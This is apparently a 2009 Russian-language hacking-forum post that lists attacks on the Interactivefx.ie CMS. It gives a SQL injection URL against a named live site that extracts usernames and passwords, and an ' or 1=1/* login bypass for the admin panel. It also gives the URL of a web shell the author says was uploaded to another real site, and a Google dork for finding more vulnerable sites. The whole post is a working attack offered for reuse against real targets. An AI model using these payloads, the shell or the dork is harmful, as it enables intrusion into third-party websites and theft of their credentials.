Interactivefx.ie CMS

Discussion in 'Веб-уязвимости' started by $n@ke, 1 Feb 2009.

  1. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Interactivefx.ie CMS
    Sql-inj

    PHP:
    http://www.garterlane.ie/event-details.php?id=223'+select+username,password+from+users/*
    Обход авторизации в админке

    PHP:
    login:' or 1=1/*
    pass: anypassyouwish
    Заливка файлов есть и много, зависит от количества установленных дополнений, но, то ли .htaccess мешает, то ли еще что. Вобщем шелл залился только в одном случае, однако жестокая конфигурация сервера:
    PHP:
    http://www.azzurri.ie/pdfs/stnc.php
    PHP:
    google dork"Copyright Interactivefx.ie"
     
    3 people like this.